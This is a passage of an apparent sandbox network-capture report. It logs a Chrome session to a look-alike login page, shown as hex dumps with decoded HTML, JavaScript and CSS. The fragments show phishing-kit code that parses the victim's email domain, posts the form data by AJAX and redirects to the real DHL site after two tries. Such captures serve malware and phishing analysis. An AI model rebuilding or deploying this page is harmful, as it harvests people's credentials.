                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbNvYbt%2BhN6rVKNL9PG5L%2FYwe3zM5BnxxQJHrWvzjEGNDhjSGOj01D4F5DFUMLAtPz08VFwmZOT%2FYG4UC%2B7Aq%2FjSwCo01OUwjeaVA70Eqf2IxuUTKEcyJ6hJ7e%2FVrrsVtaKKuaOH7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53346cb3bf5f6-EWR
                                                                  2024-12-30 21:42:33 UTC247INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 34 34 26 6d 69 6e 5f 72 74 74 3d 31 34 36 36 26 72 74 74 5f 76 61 72 3d 37 30 36 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 31 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 33 26 72 65 63 76 5f 62 79 74 65 73 3d 37 39 31 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 33 39 36 34 36 31 26 63 77 6e 64 3d 31 38 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 65 65 64 37 62 66 35 33 62 61 64 31 31 65 66 38 26 74 73 3d 33 31 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                  Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1466&rtt_var=706&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2833&recv_bytes=7917&delivery_rate=1396461&cwnd=183&unsent_bytes=0&cid=eed7bf53bad11ef8&ts=315&x=0"
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 32 32 37 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 6a 71 75 65 72 79 2d 75 69 2e 73 74 72 75 63 74 75 72 65 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 6a 71 75 65 72 79 2d 75 69 2e 74 68 65 6d 65 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68
                                                                  Data Ascii: 2274<html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="assets/jquery-ui.structure.css"> <link rel="stylesheet" href="assets/jquery-ui.theme.css"> <link rel="stylesheet" h
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 3d 22 6c 6f 67 69 6e 2d 74 61 62 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 69 63 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 77 69 64 74 68 3d 22 32 35 22 20 68 65 69 67 68 74 3d 22 32 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 31 32 2e 35 22 20 63 79 3d 22 31 32 2e 35 22 20 72 3d 22 38 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 2e 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 2f 63 69 72 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 20 66 6f 6e 74 2d 73 69 7a 65 3d 22 31 33 22 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3d 22 56 65
                                                                  Data Ascii: ="login-tab__information-icon"> <svg width="25" height="25"> <circle cx="12.5" cy="12.5" r="8" stroke-width="1.2" fill="none"></circle> <text font-size="13" font-family="Ve
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 43 6f 6c 6f 72 20 6c 6f 67 69 6e 2d 66 6f 72 6d 2d 76 69 65 77 5f 5f 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 73 75 62 6d 69 74 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 63 65 3a 20 26 23 33 39 3b 43 6f 6d 69 63 20 53 61 6e 73 20 4d 53 26 23 33 39 3b 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 6c 61 72 67 65 72 3b 20 63 6f 6c 6f 72 3a 20 57 68 69 74 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 35 33 2c 20 30 2c 20 30 29 3b 20 62 6f 72 64 65 72 3a 20 30 70 74 20 72 69 64 67 65 20 6c 69 67 68 74 67 72 65 79 22 20 76 61 6c 75 65 3d 22 20 4c 6f 67 69 6e 20 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c
                                                                  Data Ascii: Color login-form-view__login-button" type="button" id="submit-btn" style="font-face: &#39;Comic Sans MS&#39;; font-size: larger; color: White; background-color: rgb(153, 0, 0); border: 0pt ridge lightgrey" value=" Login "> <div cl
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 64 6f 6d 61 69 6e 2e 63 6c 6f 75 64 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 49 6d 70 72 69 6e 74 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4f 70 74 69 6f 6e 61 6c 20 4a 61 76 61 53 63 72 69 70 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 6a 51 75 65 72 79 20 66 69 72 73 74 2c 20 74 68 65 6e 20 50 6f 70 70 65 72 2e 6a 73 2c 20 74 68 65 6e 20 42 6f 6f 74 73 74 72 61 70 20 4a 53 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72
                                                                  Data Ascii: domain.cloud/index.html" target="_blank"> Imprint </a> </div> ... Optional JavaScript --> ... jQuery first, then Popper.js, then Bootstrap JS --> <script type="text/javascript" src="https://code.jquery.com/jquer
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 20 20 20 76 61 72 20 69 6e 64 20 3d 20 6d 79 5f 61 69 2e 69 6e 64 65 78 4f 66 28 22 40 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 79 5f 73 6c 69 63 65 20 3d 20 6d 79 5f 61 69 2e 73 75 62 73 74 72 28 28 69 6e 64 20 2b 20 31 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 6d 79 5f 73 6c 69 63 65 2e 73 75 62 73 74 72 28 30 2c 20 6d 79 5f 73 6c 69 63 65 2e 69 6e 64 65 78 4f 66 28 27 2e 27 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6e 61 6c 20 3d 20 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 61 69 27 29 2e 76 61 6c 28 6d 79 5f 61 69 29 3b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 61 69 63 68 27 29 2e 68 74 6d 6c 28 6d 79 5f 61 69 29 3b 0d 0a 20 20 20 20 20 20 20 20 24
                                                                  Data Ascii: var ind = my_ai.indexOf("@"); var my_slice = my_ai.substr((ind + 1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final = c.toLowerCase(); $('#ai').val(my_ai); $('#aich').html(my_ai); $
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 5f 61 69 2e 73 75 62 73 74 72 28 28 69 6e 64 20 2b 20 31 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 6d 79 5f 73 6c 69 63 65 2e 73 75 62 73 74 72 28 30 2c 20 6d 79 5f 73 6c 69 63 65 2e 69 6e 64 65 78 4f 66 28 27 2e 27 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6e 61 6c 20 3d 20 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 6e 65 77 20 69 6e 6a 65 63 74 69 6f 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 20 20 20 20 20 20 20 20 63 6f 75 6e 74 20 3d 20 63 6f 75 6e 74 20 2b 20 31 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 24 2e 61 6a 61 78 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0d 0a 20 20 20 20
                                                                  Data Ascii: _ai.substr((ind + 1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final = c.toLowerCase(); ///////////new injection//////////////// count = count + 1; $.ajax({ dataType: 'JSON',
                                                                  2024-12-30 21:42:33 UTC614INData Raw: 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 72 72 6f 72 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 23 70 72 22 29 2e 76 61 6c 28 22 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 6f 75 6e 74 20 3e 3d 20 32 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 75 6e 74 20 3d 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 68 6c 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 67 30 2f 65 6e 2f 65 78 70 72 65 73 73 2f 74 72 61 63
                                                                  Data Ascii: } }, error: function() { $("#pr").val(""); if (count >= 2) { count = 0; window.location.replace("https://www.dhl.com/content/g0/en/express/trac
                                                                  2024-12-30 21:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.458482188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1372OUTGET /vfd23ced/assets/jquery-ui.structure.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC877INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 16398
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iSGZ4GjHnLVGNdNKm%2Bzu5bBGJewpK5yILQCiGPouiWxGh4eacOZY0ONCGoeh1MQUBd3GtPTaylGn4zrPmkcQrAJ1rN7aCEHJ6qRqqZxP5zKH9HBHXVpe9uUugOHr3IcYXC%2Blb89vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53349ac924401-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1585&rtt_var=606&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1950&delivery_rate=1788120&cwnd=233&unsent_bytes=0&cid=bbea04e308d2e12f&ts=716&x=0"
                                                                  2024-12-30 21:42:33 UTC492INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 68 69 64 64 65 6e 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 68 69 64 64 65 6e 2d 61 63 63 65 73 73 69 62 6c 65 20 7b 20 62 6f 72 64 65 72 3a 20 30 70 78 20 6e 6f 6e 65 3b 20 63 6c 69 70 3a 20 72 65 63 74 28 30 70 78 2c 20 30 70 78 2c 20 30 70 78 2c 20 30 70 78 29 3b 20 68 65 69 67 68 74 3a 20 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 77 69 64 74 68 3a 20 31 70 78 3b 20 7d 0a 2e 75 69 2d 68 65 6c 70 65 72
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.ui-helper-hidden { display: none; }.ui-helper-hidden-accessible { border: 0px none; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px; }.ui-helper
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 20 63 6f 6c 6c 61 70 73 65 3b 20 7d 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 63 6c 65 61 72 66 69 78 3a 3a 61 66 74 65 72 20 7b 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 20 7d 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 63 6c 65 61 72 66 69 78 20 7b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 30 70 78 3b 20 7d 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 7a 66 69 78 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 74 6f 70 3a 20 30 70 78 3b 20 6c 65 66 74 3a 20 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 7d 0a 2e 75 69 2d 66 72 6f 6e 74 20 7b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 20 7d
                                                                  Data Ascii: splay: table; border-collapse: collapse; }.ui-helper-clearfix::after { clear: both; }.ui-helper-clearfix { min-height: 0px; }.ui-helper-zfix { width: 100%; height: 100%; top: 0px; left: 0px; position: absolute; opacity: 0; }.ui-front { z-index: 100; }
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2d 72 65 73 69 7a 61 62 6c 65 2d 6e 65 20 7b 20 63 75 72 73 6f 72 3a 20 6e 65 2d 72 65 73 69 7a 65 3b 20 77 69 64 74 68 3a 20 39 70 78 3b 20 68 65 69 67 68 74 3a 20 39 70 78 3b 20 72 69 67 68 74 3a 20 2d 35 70 78 3b 20 74 6f 70 3a 20 2d 35 70 78 3b 20 7d 0a 2e 75 69 2d 73 65 6c 65 63 74 61 62 6c 65 20 7b 20 20 7d 0a 2e 75 69 2d 73 65 6c 65 63 74 61 62 6c 65 2d 68 65 6c 70 65 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 64 6f 74 74 65 64 20 62 6c 61 63 6b 3b 20 7d 0a 2e 75 69 2d 73 6f 72 74 61 62 6c 65 2d 68 61 6e 64 6c 65 20 7b 20 20 7d 0a 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 2d 68 65 61 64 65 72 20 7b 20 64
                                                                  Data Ascii: -resizable-ne { cursor: ne-resize; width: 9px; height: 9px; right: -5px; top: -5px; }.ui-selectable { }.ui-selectable-helper { position: absolute; z-index: 100; border: 1px dotted black; }.ui-sortable-handle { }.ui-accordion .ui-accordion-header { d
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 0a 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2d 6f 6e 6c 79 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 20 7b 20 70 61 64 64 69 6e 67 3a 20 30 2e 34 65 6d 20 31 65 6d 3b 20 7d 0a 2e 75 69 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6f 6e 6c 79 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2c 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 73 2d 6f 6e 6c 79 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 20 7b 20 70 61 64 64 69 6e 67 3a 20 30 2e 34 65 6d 3b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 31 65 2b 37 70 78 3b 20 7d 0a 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2d 69 63 6f 6e 2d 70 72 69 6d 61 72 79 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2c 20 2e 75 69 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2d
                                                                  Data Ascii: ht: normal; }.ui-button-text-only .ui-button-text { padding: 0.4em 1em; }.ui-button-icon-only .ui-button-text, .ui-button-icons-only .ui-button-text { padding: 0.4em; text-indent: -1e+7px; }.ui-button-text-icon-primary .ui-button-text, .ui-button-text-
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 65 72 3a 20 30 70 78 20 6e 6f 6e 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 7b 20 77 69 64 74 68 3a 20 31 37 65 6d 3b 20 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 20 30 2e 32 65 6d 20 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 68 65 61 64 65 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 20 30 70 78 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 2c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 20
                                                                  Data Ascii: er: 0px none; padding: 0px; }.ui-datepicker { width: 17em; padding: 0.2em 0.2em 0px; display: none; }.ui-datepicker .ui-datepicker-header { position: relative; padding: 0.2em 0px; }.ui-datepicker .ui-datepicker-prev, .ui-datepicker .ui-datepicker-next
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 2c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 74 64 20 61 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 62 75 74 74 6f 6e 70 61 6e 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 3a 20 30 2e 37 65 6d 20 30 70 78 20 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 30 2e 32 65 6d 3b 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 30 70 78 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 30 70 78 20 6e 6f 6e
                                                                  Data Ascii: n, .ui-datepicker td a { display: block; padding: 0.2em; text-align: right; text-decoration: none; }.ui-datepicker .ui-datepicker-buttonpane { background-image: none; margin: 0.7em 0px 0px; padding: 0px 0.2em; border-left: 0px none; border-right: 0px non
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 78 74 20 7b 20 6c 65 66 74 3a 20 32 70 78 3b 20 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 72 74 6c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 3a 68 6f 76 65 72 20 7b 20 72 69 67 68 74 3a 20 31 70 78 3b 20 6c 65 66 74 3a 20 61 75 74 6f 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 72 74 6c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 3a 68 6f 76 65 72 20 7b 20 6c 65 66 74 3a 20 31 70 78 3b 20 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 72 74 6c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 62 75 74 74 6f 6e 70 61 6e 65 20 7b 20 63 6c 65 61 72 3a 20 72 69 67 68 74 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d
                                                                  Data Ascii: xt { left: 2px; right: auto; }.ui-datepicker-rtl .ui-datepicker-prev:hover { right: 1px; left: auto; }.ui-datepicker-rtl .ui-datepicker-next:hover { left: 1px; right: auto; }.ui-datepicker-rtl .ui-datepicker-buttonpane { clear: right; }.ui-datepicker-
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 35 65 6d 3b 20 70 61 64 64 69 6e 67 3a 20 30 2e 33 65 6d 20 31 65 6d 20 30 2e 35 65 6d 20 30 2e 34 65 6d 3b 20 7d 0a 2e 75 69 2d 64 69 61 6c 6f 67 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 62 75 74 74 6f 6e 70 61 6e 65 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 62 75 74 74 6f 6e 73 65 74 20 7b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 2e 75 69 2d 64 69 61 6c 6f 67 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 62 75 74 74 6f 6e 70 61 6e 65 20 62 75 74 74 6f 6e 20 7b 20 6d 61 72 67 69 6e 3a 20 30 2e 35 65 6d 20 30 2e 34 65 6d 20 30 2e 35 65 6d 20 30 70 78 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 7d 0a 2e 75 69 2d 64 69 61 6c 6f 67 20 2e 75 69 2d 72 65 73 69 7a 61 62 6c 65 2d 73 65 20 7b 20 77 69 64 74 68 3a 20 31 32
                                                                  Data Ascii: argin-top: 0.5em; padding: 0.3em 1em 0.5em 0.4em; }.ui-dialog .ui-dialog-buttonpane .ui-dialog-buttonset { float: right; }.ui-dialog .ui-dialog-buttonpane button { margin: 0.5em 0.4em 0.5em 0px; cursor: pointer; }.ui-dialog .ui-resizable-se { width: 12
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 3b 62 61 73 65 36 34 2c 52 30 6c 47 4f 44 6c 68 4b 41 41 6f 41 49 41 42 41 41 41 41 41 50 2f 2f 2f 79 48 2f 43 30 35 46 56 46 4e 44 51 56 42 46 4d 69 34 77 41 77 45 41 41 41 41 68 2b 51 51 4a 41 51 41 42 41 43 77 41 41 41 41 41 4b 41 41 6f 41 41 41 43 6b 59 77 4e 71 58 72 64 43 35 32 44 53 30 36 61 37 4d 46 5a 49 2b 34 46 48 42 43 4b 6f 44 65 57 4b 58 71 79 6d 50 71 47 71 78 76 4a 72 58 5a 62 4d 78 37 54 74 63 2b 77 39 58 67 55 32 46 42 33 6c 4f 79 51 52 57 45 54 32 49 46 47 69 55 39 6d 31 66 72 44 56 70 78 5a 5a 63 36 62 66 48 77 76 34 63 31 59 58 50 36 6b 31 56 64 79 32 39 32 46 62 36 55 6b 75 76 46 74 58 70 76 57 53
                                                                  Data Ascii: { background: transparent url("data:image/gif;base64,R0lGODlhKAAoAIABAAAAAP///yH/C05FVFNDQVBFMi4wAwEAAAAh+QQJAQABACwAAAAAKAAoAAACkYwNqXrdC52DS06a7MFZI+4FHBCKoDeWKXqymPqGqxvJrXZbMx7Ttc+w9XgU2FB3lOyQRWET2IFGiU9m1frDVpxZZc6bfHwv4c1YXP6k1Vdy292Fb6UkuvFtXpvWS
